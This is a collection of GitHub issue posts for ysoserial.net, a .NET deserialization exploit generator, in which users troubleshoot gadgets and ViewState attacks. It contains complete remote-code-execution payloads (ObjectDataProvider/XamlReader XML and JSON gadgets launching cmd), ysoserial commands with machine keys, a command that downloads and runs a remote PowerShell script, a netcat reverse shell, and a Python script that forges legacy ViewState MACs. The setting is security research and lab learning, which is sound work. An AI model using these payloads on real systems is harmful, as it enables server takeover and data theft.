pwntester / ysoserial.net
Deserialization payload generator for a variety of .NET formatters
License: MIT License
Hello
I'm trying to research a vulnerability in our Azure samples arising from BinaryFormatter.
The latest release of the tool doesn't contain the ClaimsPrincipal gadget, so I had to clone and build the code.
Immediately after the build, the .exe file is deleted by Windows Security with the following action message:
Hi,
I'm looking for a gadget that can be used with the DataContractJsonSerializer.
If there is one, I can test it and include it in the tool.
Thanks,
Gerardo
I think the command argument ("C|command=") should be lowercase ("c|command=") in /ysoserial/Plugins/DotNetNukePlugin.cs to match the rest of the tool.
Hello,
I'm training on deserialization and I'm currently on .NET, so thank you already for this tool and your conferences; they helped me a lot.
After having created a simple lab with a deserialization in a viewstate (MAC not enabled / viewstate not encrypted), I wonder if it is possible to block the execution of the thread in cases where out-of-band detection is not possible?
For example, if I generate the payload with the following command, the output will be written to the specified file.
.\ysoserial.exe -o base64 -g TypeConfuseDelegate -f LosFormatter -c "echo 1234 > C:/Windows/temp/exploit.txt"
I can also get a DNS request with the following payload:
.\ysoserial.exe -o base64 -g TypeConfuseDelegate -f LosFormatter -c "ping my.server.tld -n 10"
But if I do a sleep, the command will be transparent because it is executed in a thread. Is it possible to block the thread, or to do otherwise (for example, modify the gadget)?
Regards
Hi there,
I have this .NET code
using System;
using System.IO;
using System.Xml;
using System.Xml.Serialization;

// The declared type is fixed to String; "http://web.com/a" is the default
// namespace the serializer expects on the root element
XmlSerializer xmlSerializer = new XmlSerializer(typeof(String), "http://web.com/a");
XmlTextReader xmlReader = new XmlTextReader(stream)
{
    WhitespaceHandling = WhitespaceHandling.None
};
String s = xmlSerializer.Deserialize(xmlReader) as String;
I generated this XML PoC
<?xml version="1.0"?>
<root xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
<ExpandedWrapperOfXamlReaderObjectDataProvider>
<ExpandedElement/>
<ProjectedProperty0>
<MethodName>Parse</MethodName>
<MethodParameters>
<anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">
<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:System="clr-namespace:System;assembly=mscorlib" xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">
<ObjectDataProvider x:Key="LaunchCmd" ObjectType="{x:Type Diag:Process}" MethodName="Start">
<ObjectDataProvider.MethodParameters>
<System:String>cmd</System:String>
<System:String>/c calc</System:String>
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
</ResourceDictionary>
</anyType>
</MethodParameters>
<ObjectInstance xsi:type="XamlReader"></ObjectInstance>
</ProjectedProperty0>
</ExpandedWrapperOfXamlReaderObjectDataProvider>
</root>
During deserialization I get this error:
Unhandled Exception: System.InvalidOperationException: There is an error in XML document (2, 2). ---> System.InvalidOperationException: <root xmlns=''> was not expected.
at Microsoft.Xml.Serialization.GeneratedAssembly.XmlSerializationReaderString.Read1_string()
--- End of inner exception stack trace ---
at System.Xml.Serialization.XmlSerializer.Deserialize(XmlReader xmlReader, String encodingStyle, XmlDeserializationEvents events)
at System.Xml.Serialization.XmlSerializer.Deserialize(XmlReader xmlReader)
at ysoserial.Program.Main(String[] args) in C:\Users\vava\Desktop\hacktools\ysoserial.net-master\ysoserial\Program.cs:line 27
Could you help me? How can I fix it, and why am I getting this error?
NetVersion: 4.7.03062
<machineKey compatibilityMode="Framework45" decryptionKey="AutoGenerate,IsolateApps" validationKey="AutoGenerate,IsolateApps" />
ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "test.cs;System.dll;System.IO.dll;System.Web.dll" --validationalg="HMACSHA256" --validationkey="9E23971A70539C4C5D1EFE2FACD22B03C2BCE8414D6FB1D1308F5A47C839808EC7C8156654AB8FB14CB643B7954C3956191C7690F0F4EF5104C1E93EA3540871" --decryptionalg="Auto" --decryptionkey="9E23971A87F9ED201A833CDEBAF01C9C7DFF2A72B6E1D087" --apppath="/owa" --path="/owa/auth/logon.aspx" --islegacy --isdebug > test.txt
The response is always 200
Although the whitepaper says that in the DataContractSerializer case it is enough to control the expected type only, the trick with ExpandedWrapper to include Process in the object graph doesn't work in the example below:
<?xml version="1.0"?>
<root xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<item type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
<ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL xmlns="http://schemas.datacontract.org/2004/07/System.Data.Services.Internal" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<ExpandedElement i:nil="true" xmlns:a="http://schemas.datacontract.org/2004/07/System.Diagnostics"/>
<ProjectedProperty0 xmlns:a="http://schemas.datacontract.org/2004/07/System.Windows.Data">
<a:MethodName>Start</a:MethodName>
<a:MethodParameters xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<b:anyType i:type="c:string" xmlns:c="http://www.w3.org/2001/XMLSchema">calc</b:anyType>
</a:MethodParameters>
<a:ObjectInstance i:type="b:Process" xmlns:b="http://schemas.datacontract.org/2004/07/System.Diagnostics">
<__identity i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System"/>
</a:ObjectInstance>
</ProjectedProperty0>
</ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL>
</item>
</root>
It works only if typeof(Process) is passed as a knownType:
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.Serialization;
using System.Xml;

var xmlDoc = new XmlDocument();
xmlDoc.Load("testdeser.xml");
foreach (XmlElement xmlItem in xmlDoc.SelectNodes("root/item"))
{
    // The expected type is read from the "type" attribute of the input itself
    string typeName = xmlItem.GetAttribute("type");
    // Process is registered explicitly as a known type
    var s = new DataContractSerializer(Type.GetType(typeName), new[] { typeof(Process) });
    var reader = new XmlTextReader(new StringReader(xmlItem.InnerXml));
    var a = s.ReadObject(reader);
}
Hello,
I have an error executing a PSObject payload (ASP.NET Core Runtime 2.1.23). Does it mean I have to bypass loadFromRemoteSources restrictions on the target too?
ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "ping 10.0.0.1" -t
Unhandled Exception: System.NotSupportedException: An attempt was made to load an assembly from a network location which would have caused the assembly to be sandboxed in previous versions of the .NET Framework. This release of the .NET Framework does not enable CAS policy by default, so this load may be dangerous. If this load is not intended to sandbox the assembly, please enable the loadFromRemoteSources switch. See http://go.microsoft.com/fwlink/?LinkId=155569 for more information.
at System.Reflection.RuntimeAssembly.nLoadFile(String path, Evidence evidence)
at System.Reflection.Assembly.LoadFile(String path)
at ysoserial.Generators.PSObjectGenerator.Generate(String formatter, InputArgs inputArgs) in D:\a\ysoserial.net\ysoserial.net\ysoserial\Generators\PSObjectGenerator.cs:line 67
at ysoserial.Generators.GenericGenerator.GenerateWithInit(String formatter, InputArgs inputArgs) in D:\a\ysoserial.net\ysoserial.net\ysoserial\Generators\GenericGenerator.cs:line 68
at ysoserial.Program.Main(String[] args) in D:\a\ysoserial.net\ysoserial.net\ysoserial\Program.cs:line 197
Is this used within viewgen?
Testing payload mode run_command did not work on a fresh install of DotNetNuke 07.03.04. I will submit a PR with a fix.
Hi,
I have a question here rather than an issue.
I'm currently trying to exploit a potential deserialization vulnerability in a web application that uses JavaScriptObjectDeserializer. I tried to exploit the vulnerability with the JavaScriptObjectDeserializer payload given here:
{
'__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'ObjectInstance':{
'__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'StartInfo': {
'__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'FileName':'cmd',
'Arguments':'/c nslookup collaborator.somedomain.com'
}
}
}
The Web application throws the following error:
{"Message":"The operation is invalid due to the current state of the object.","StackTrace":" at System.Web.Script.Serialization.ObjectConverter.ConvertDictionaryToObject(IDictionary`2 dictionary, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object\u0026 convertedObject)\r\n at System.Web.Script.Serialization.ObjectConverter.ConvertObjectToTypeInternal(Object o, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object\u0026 convertedObject)\r\n at System.Web.Script.Serialization.ObjectConverter.ConvertObjectToTypeMain(Object o, Type type, JavaScriptSerializer serializer, Boolean throwOnError, Object\u0026 convertedObject)\r\n at System.Web.Script.Serialization.ObjectConverter.ConvertObjectToType(Object o, Type type, JavaScriptSerializer serializer)\r\n at System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth)\r\n at System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeDictionary(Int32 depth)\r\n at System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth)\r\n at System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeDictionary(Int32 depth)\r\n at System.Web.Script.Serialization.JavaScriptObjectDeserializer.DeserializeInternal(Int32 depth)\r\n at System.Web.Script.Serialization.JavaScriptObjectDeserializer.BasicDeserialize(String input, Int32 depthLimit, JavaScriptSerializer serializer)\r\n at System.Web.Script.Serialization.JavaScriptSerializer.Deserialize[T](String input)\r\n at System.Web.Script.Services.RestHandler.ExecuteWebServiceCall(HttpContext context, WebServiceMethodData methodData)","ExceptionType":"System.InvalidOperationException"}
No DNS lookup was executed here. I'm just learning how to exploit deserialization vulnerabilities, but from my previous research I estimate that the application no longer accepts the object System.Windows.Data.ObjectDataProvider because it has been patched. Do I assume this correctly, or should RCE always be possible if the deserialization fails with an error message?
Unfortunately, I don't have access to source code (black box).
Thank you for your answers.
Greetings
It appears that Forshaw's SurrogateSelector gadget has been fixed in newer versions of DotNet. The patch notes are here for reference. I have yet to dig into exactly what has been corrected, but my guess would be some sort of type filtering to prevent the serialization of arbitrary objects.
Attempting to generate a payload on a host with 4.8 installed will produce the following error:
ysoserial.exe -g ActivitySurrogateSelector -f BinaryFormatter -o base64 -c none --test
Unhandled Exception: System.ArgumentException: obj
at System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector.ObjectSurrogate.GetObjectData(Object obj, SerializationInfo info, StreamingContext context)
at System.Runtime.Serialization.Formatters.Binary.WriteObjectInfo.InitSerialize(Object obj, ISurrogateSelector surrogateSelector, StreamingContext context, SerObjectInfoInit serObjectInfoInit, IFormatterConverter converter, ObjectWriter objectWriter, SerializationBinder binder)
at System.Runtime.Serialization.Formatters.Binary.WriteObjectInfo.Serialize(Object obj, ISurrogateSelector surrogateSelector, StreamingContext context, SerObjectInfoInit serObjectInfoInit, IFormatterConverter converter, ObjectWriter objectWriter, SerializationBinder binder)
at System.Runtime.Serialization.Formatters.Binary.ObjectWriter.Serialize(Object graph, Header[] inHeaders, __BinaryWriter serWriter, Boolean fCheck)
at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Serialize(Stream serializationStream, Object graph, Header[] headers, Boolean fCheck)
at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Serialize(Stream serializationStream, Object graph)
at ysoserial.Generators.PayloadClass.GetObjectData(SerializationInfo info, StreamingContext context) in C:\ysoserial.net\ysoserial\Generators\ActivitySurrogateSelectorGenerator.cs:line 117
at System.Runtime.Serialization.Formatters.Binary.WriteObjectInfo.InitSerialize(Object obj, ISurrogateSelector surrogateSelector, StreamingContext context, SerObjectInfoInit serObjectInfoInit, IFormatterConverter converter, ObjectWriter objectWriter, SerializationBinder binder)
at System.Runtime.Serialization.Formatters.Binary.WriteObjectInfo.Serialize(Object obj, ISurrogateSelector surrogateSelector, StreamingContext context, SerObjectInfoInit serObjectInfoInit, IFormatterConverter converter, ObjectWriter objectWriter, SerializationBinder binder)
at System.Runtime.Serialization.Formatters.Binary.ObjectWriter.Serialize(Object graph, Header[] inHeaders, __BinaryWriter serWriter, Boolean fCheck)
at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Serialize(Stream serializationStream, Object graph, Header[] headers, Boolean fCheck)
at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Serialize(Stream serializationStream, Object graph)
at ysoserial.Generators.GenericGenerator.Serialize(Object cmdobj, String formatter, Boolean test) in C:\ysoserial.net\ysoserial\Generators\GenericGenerator.cs:line 37
at ysoserial.Generators.ActivitySurrogateSelectorGenerator.Generate(String cmd, String formatter, Boolean test) in C:\ysoserial.net\ysoserial\Generators\ActivitySurrogateSelectorGenerator.cs:line 143
at ysoserial.Program.Main(String[] args) in C:\ysoserial.net\ysoserial\Program.cs:line 135
Would the preferred "fix" simply be a note in the help text for the time being?
I tried to build the ysoserial solution, but it throws the errors:
The type or namespace name 'NDesk' could not be found (are you missing a using directive or an assembly reference?)
The type or namespace name 'OptionSet' could not be found (are you missing a using directive or an assembly reference?)
I have already installed .NET Framework 4.5.2 and tried to rebuild the solution, but it did not help. What could I be missing? Thanks a lot.
To make ysoserial accessible on multiple platforms (mac, linux, windows), containerizing the code is a good solution. Once that is done, adding it to a docker registry can ease installation: the user would only have to pull the image and run it, regardless of their OS.
https://puppet.com/docs/pipelines-for-apps/enterprise/docker-c-sharp.html
https://docs.docker.com/engine/examples/dotnetcore/
I am facing an issue with the downloaded pre-compiled executable (1.32, latest release).
When I try to run the executable, it gives a permission denied error like:
-bash: ./ysoserial.exe: Permission denied
I am running it through Cygwin.
Hi,
I noticed that a command like ysoserial.exe -p DotNetNuke -m run_command -c "powershell.exe iex (New-Object Net.WebClient).DownloadString('https://example.com/helloWorld.ps1')" produces slightly longer output in version 1.32 than in 1.34. Along with this, the output from the newer version didn't succeed in executing, but version 1.32 did. The difference in length looks to be inside the "anyType" tags.
The outputs are the following:
1.32:
<profile><item key="key" type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">...
1.34:
<profile><item key="key" type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">...
Hello,
I'm trying the code execution vulnerability in a lab environment where the validation key and decryption keys are known. Unfortunately, I cannot get it to work no matter what I try.
I'm using .NET 4.0.
I've tried both setting the ViewStateGenerator and setting the app path (and I confirm that the ViewStateGenerator value is correct). I have also tried appending ='s at the end of the generated code. I've also tried URL-encoding the generated viewstate that I send in the POST request.
Nothing works. I can't even get a single echo 123 > c:\windows\temp\test.txt working. What am I doing wrong?
(I know it should throw a 500 exception, but it should also create test.txt, which it doesn't.)
Here are some of the commands I have tried:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --apppath="/p" --path="/p/default.aspx" --islegacy --validationalg="SHA1" --validationkey="1CAD8CD7D5084010C7AC86E09C048DF2E6351D8E1458173BD2F60C948FDCFC79474E7C4BFB8053B3D599D564C3F8F16CD36D4BFF85DC2B86964E110CAB5529B5" --isdebug
Also tried with giving both keys:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/p/default.aspx" --apppath="/p" --decryptionalg="Auto" --decryptionkey="9419E035D0FF7D8038D0DA7A21AFB4482C82E939147FB1C1B1F7EBCDDC69B617" --validationalg="SHA1" --validationkey="1CAD8CD7D5084010C7AC86E09C048DF2E6351D8E1458173BD2F60C948FDCFC79474E7C4BFB8053B3D599D564C3F8F16CD36D4BFF85DC2B86964E110CAB5529B5"
The generator code for the above path is 333BF894
Thanks!
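As an added example (not ysoserial.net's own code), the following Python reproduces the legacy ViewState MAC layout that the --islegacy / SHA1 flags in the post above target. It assumes the pre-4.5 MachineKeySection behaviour with validation="SHA1" and no encryption: HMAC-SHA1 over the serialized state followed by the MAC modifier (the __VIEWSTATEGENERATOR as four little-endian bytes, then the UTF-16LE ViewStateUserKey if one is configured), appended to the state and base64-encoded. The validation key and generator are the ones quoted in the post; the serialized state is a constructed placeholder, not a gadget.

```python
"""Legacy ASP.NET ViewState MAC (the --islegacy / pre-4.5 layout). Added example.

Assumed layout (MachineKeySection legacy mode, validation="SHA1", no encryption):
    __VIEWSTATE = base64( state || HMAC-SHA1(validationKey, state || modifier) )
    modifier    = __VIEWSTATEGENERATOR as 4 little-endian bytes,
                  followed by the UTF-16LE ViewStateUserKey when one is set
"""
import base64
import hashlib
import hmac
from typing import Optional, Tuple

HMAC_SHA1_LEN = 20

# Key and generator quoted in the issue above. The state is a constructed
# stand-in (an ObjectStateFormatter stream starts with 0xFF 0x01), not a real gadget.
VALIDATION_KEY_HEX = ("1CAD8CD7D5084010C7AC86E09C048DF2E6351D8E1458173BD2F60C948FDCFC79"
                      "474E7C4BFB8053B3D599D564C3F8F16CD36D4BFF85DC2B86964E110CAB5529B5")
GENERATOR_HEX = "333BF894"
SAMPLE_STATE = b"\xff\x01" + b"constructed-state-bytes"


def mac_modifier(generator_hex: str, viewstate_user_key: Optional[str] = None) -> bytes:
    """Rebuild Page.GetMacKeyModifier(): generator as LE uint32, then the user key."""
    modifier = (int(generator_hex, 16) & 0xFFFFFFFF).to_bytes(4, "little")
    if viewstate_user_key:
        modifier += viewstate_user_key.encode("utf-16-le")
    return modifier


def _mac_tag(state: bytes, validation_key_hex: str, generator_hex: str,
             viewstate_user_key: Optional[str]) -> bytes:
    """HMAC-SHA1 over state || modifier, keyed with the raw validationKey bytes."""
    key = bytes.fromhex(validation_key_hex)
    msg = state + mac_modifier(generator_hex, viewstate_user_key)
    return hmac.new(key, msg, hashlib.sha1).digest()


def sign_viewstate_legacy(state: bytes, validation_key_hex: str, generator_hex: str,
                          viewstate_user_key: Optional[str] = None) -> str:
    """Produce the __VIEWSTATE field value for an already serialized state."""
    tag = _mac_tag(state, validation_key_hex, generator_hex, viewstate_user_key)
    return base64.b64encode(state + tag).decode("ascii")


def split_viewstate(viewstate_b64: str) -> Tuple[bytes, bytes]:
    """Separate the serialized state from the trailing 20-byte HMAC-SHA1."""
    raw = base64.b64decode(viewstate_b64)
    if len(raw) < HMAC_SHA1_LEN:
        raise ValueError("too short to carry an HMAC-SHA1 tag")
    return raw[:-HMAC_SHA1_LEN], raw[-HMAC_SHA1_LEN:]


def verify_viewstate_legacy(viewstate_b64: str, validation_key_hex: str, generator_hex: str,
                            viewstate_user_key: Optional[str] = None) -> Optional[bytes]:
    """Return the serialized state when the MAC verifies, else None.

    This mirrors the order on the server: the MAC is checked before anything
    is handed to the deserializer, so a wrong key or generator never reaches a gadget.
    """
    state, tag = split_viewstate(viewstate_b64)
    expected = _mac_tag(state, validation_key_hex, generator_hex, viewstate_user_key)
    return state if hmac.compare_digest(tag, expected) else None


if __name__ == "__main__":
    vs = sign_viewstate_legacy(SAMPLE_STATE, VALIDATION_KEY_HEX, GENERATOR_HEX)
    print("__VIEWSTATEGENERATOR:", GENERATOR_HEX)
    print("__VIEWSTATE:", vs)
    print("right key/generator:", verify_viewstate_legacy(vs, VALIDATION_KEY_HEX, GENERATOR_HEX) is not None)
    print("wrong generator:", verify_viewstate_legacy(vs, VALIDATION_KEY_HEX, "00000000") is not None)
```

Two checks follow from this layout when a payload is "silently" rejected: the generator used for the modifier must be the one the page actually emits in __VIEWSTATEGENERATOR, and a configured ViewStateUserKey changes the modifier even though it never appears in the page. With compatibilityMode="Framework45" (the default from .NET 4.5 on) the key is derived per purpose with SP800-108 and this legacy layout does not apply, which is the non --islegacy path of the tool.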
Quickly tried to make a sample vulnerable .NET Core 2.1 app. It looks like none of the gadgets work on .NET Core :( but maybe I missed something.
I got this error message:
033102051731: The given key was not present in the dictionary.
at System.ThrowHelper.ThrowKeyNotFoundException()
at System.Collections.Generic.Dictionary`2.get_Item(TKey key)
at Service.Common.Login(String plainText)
My commands:
ysoserial.exe -f JavaScriptSerializer -g ObjectDataProvider -o raw -c "calc" -t
ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t
The client sends this param to the server:
{"username":"test","password":"test","deviceId":"698c7e","key":"716cbce586913b54"}
key is the AES key for encryption.
Am I missing something, or what's wrong with this method? I'm a beginner in ASP and JSON deserialization.
thanks
Hi.
Any idea why TypeConfuseDelegateMono doesn't work for me?
I built the super simple example from https://www.monodevelop.com/documentation/creating-aspnet-projects/ and I run it in xsp4, but the viewstate, which should be MAC-enabled but not encrypted (.NET 4.0 version), looks weird, and the payload generated by ysoserial.net, which is much longer, does not work. I'm using a specific validationKey in web.config for testing.
%2FwEMDAwQAgAADgEMBQMMEAIAAA4BDAUBDBACDA8BAQRUZXh0AQ5Zb3UgY2xpY2tlZCBtZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALvN0281sXomxFcIhy33ycX5EfZiafqaB78GIBHdjmVX
Mono Version Information: 6.10.0.104 (tarball Fri Jun 26 19:38:24 UTC 2020); ASP.NET Version: 4.0.30319.42000
Payload generated with:
./ysoserial.exe -p ViewState -g TypeConfuseDelegateMono -c "nc 127.0.0.1 555 -e /bin/bash" --path="/Default.aspx" --apppath="/" --islegacy --validationalg="SHA1" --validationkey="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" --isdebug
Tried to make a sample vulnerable .NET Core 3.0 app. It looks like none of the gadgets work on .NET Core.
I got the following error message when I used gadgets created by Oleksandr Mirosh (as per one of your comments on a previous similar issue raised by another user).
System.Runtime.Serialization.SerializationException: Unable to find assembly 'Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35'.
at System.Runtime.Serialization.Formatters.Binary.BinaryAssemblyInfo.GetAssembly()
at System.Runtime.Serialization.Formatters.Binary.ObjectReader.GetType(BinaryAssemblyInfo assemblyInfo, String name)
at System.Runtime.Serialization.Formatters.Binary.ObjectMap..ctor(String objectName, String[] memberNames, BinaryTypeEnum[] binaryTypeEnumA, Object[] typeInformationA, Int32[] memberAssemIds, ObjectReader objectReader, Int32 objectId, BinaryAssemblyInfo assemblyInfo, SizedArray assemIdToAssemblyTable)
at System.Runtime.Serialization.Formatters.Binary.BinaryParser.ReadObjectWithMapTyped(BinaryObjectWithMapTyped record)
at System.Runtime.Serialization.Formatters.Binary.BinaryParser.ReadObjectWithMapTyped(BinaryHeaderEnum binaryHeaderEnum)
at System.Runtime.Serialization.Formatters.Binary.BinaryParser.Run()
at System.Runtime.Serialization.Formatters.Binary.ObjectReader.Deserialize(BinaryParser serParser, Boolean fCheck)
at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Deserialize(Stream serializationStream, Boolean check)
at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Deserialize(Stream serializationStream)
at DatingApp.API.Controllers.DeserializationController.Deserialize(Info value2) in D:\DeserializationController.cs:line 73
at lambda_method(Closure , Object , Object[] )
at Microsoft.Extensions.Internal.ObjectMethodExecutor.Execute(Object target, Object[] parameters)
at Microsoft.AspNetCore.Mvc.Infrastructure.ActionMethodExecutor.SyncActionResultExecutor.Execute(IActionResultTypeMapper mapper, ObjectMethodExecutor executor, Object controller, Object[] arguments)
at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.InvokeActionMethodAsync()
at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.Next(State& next, Scope& scope, Object& state, Boolean& isCompleted)
at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.InvokeNextActionFilterAsync()
--- End of stack trace from previous location where exception was thrown ---
at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.Rethrow(ActionExecutedContextSealed context)
at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.Next(State& next, Scope& scope, Object& state, Boolean& isCompleted)
at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.InvokeInnerFilterAsync()
--- End of stack trace from previous location where exception was thrown ---
at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.<InvokeFilterPipelineAsync>g__Awaited|19_0(ResourceInvoker invoker, Task lastTask, State next, Scope scope, Object state, Boolean isCompleted)
at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.<InvokeAsync>g__Logged|17_1(ResourceInvoker invoker)
at Microsoft.AspNetCore.Routing.EndpointMiddleware.<Invoke>g__AwaitRequestTask|6_0(Endpoint endpoint, Task requestTask, ILogger logger)
at Microsoft.AspNetCore.Authorization.AuthorizationMiddleware.Invoke(HttpContext context)
at Microsoft.AspNetCore.Authentication.AuthenticationMiddleware.Invoke(HttpContext context)
at Microsoft.AspNetCore.Diagnostics.DeveloperExceptionPageMiddleware.Invoke(HttpContext context)
Many dependencies of this project are no longer supported, have been removed from NuGet for the version specified, or contain security issues in the version used. It would likely be a good idea to run through all of the dependencies and update the project to use more modern versions where applicable, or find suitable replacements where a dependency is no longer maintained.
The latest release (31) is missing half of the required DLLs, so the program just crashes when you try to run it. I finally realised this after looking at a previous release and finding it had a few more DLLs in it.
Hello, I downloaded master-Release-26, unzipped it and ran chmod +x ysoserial.exe, but I get the error:
Unhandled Exception: System.Reflection.ReflectionTypeLoadException: Exception of type 'System.Reflection.ReflectionTypeLoadException' was thrown.
Could not load file or assembly 'System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' or one of its dependencies.
at (wrapper managed-to-native) System.Reflection.Assembly.GetTypes(System.Reflection.Assembly,bool)
at System.Reflection.Assembly.GetTypes () [0x00000] in <d0e12f672b88444ab4b6d9b2ecf20142>:0
at ysoserial.Program+<>c.<Main>b__11_0 (System.Reflection.Assembly s) [0x00000] in <8eb34f80e7574b5f9f3f1f7b0e92d8f7>:0
at System.Linq.Enumerable+SelectManySingleSelectorIterator`2[TSource,TResult].MoveNext () [0x0005f] in <13c0993ff82548209b09f271bd5e6a78>:0
at System.Linq.Enumerable+WhereSelectEnumerableIterator`2[TSource,TResult].ToList () [0x00041] in <13c0993ff82548209b09f271bd5e6a78>:0
at System.Linq.Enumerable.ToList[TSource] (System.Collections.Generic.IEnumerable`1[T] source) [0x00021] in <13c0993ff82548209b09f271bd5e6a78>:0
at ysoserial.Program.Main (System.String[] args) [0x00132] in <8eb34f80e7574b5f9f3f1f7b0e92d8f7>:0
System.IO.FileNotFoundException: Could not load file or assembly 'System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' or one of its dependencies.
File name: 'System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
uname -a
5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64 GNU/Linux
(Ideally I'd start a discussion for this, but I don't believe that's enabled for this repository.)
Currently Ysoserial.NET primarily works to support generation of gadget payloads that execute a command on deserialization. There are some exceptions to this rule as some gadgets allow you to specify files and there is a plugin option to handle special cases for specific technologies.
I've been doing quite a lot of research recently into different types of gadgets that would allow a researcher to generate payloads that can perform other useful actions, such as exfiltrating files via XXE gadget chains during deserialization. I've even got a PoC that works on .NET Core and .NET 7, utilizing the serializer to bypass the default XML parsing security configurations introduced in .NET 4.5.2.
I believe there is probably some interest in being able to generate these, but I'm not sure what the consensus would be on how to approach it with respect to listing the gadgets and avoiding cluttering the command line options.
Do you have instructions on how to build the exe in linux?
This plugin's -h mentions the mode upload_file, but what is actually used is write_file:
{"m|mode=", "the payload mode: read_file, upload_file, run_command.", v => mode = v },
if (mode == "write_file" && path != "" & url != "")
This tool could be really awesome if it were integrated into ZAP; using it to attack/test web apps would be a lot easier. I've opened an issue (zaproxy/zaproxy#4112), so feel free to join the discussion...
There is a bug in Calculate7BitEncodedInt: it does not support large values. This can cause issues when minifying BinaryFormatter/LosFormatter payloads.
The affected function needs to be rewritten based on https://referencesource.microsoft.com/#mscorlib/system/io/binarywriter.cs,2daa1d14ff1877bd,references
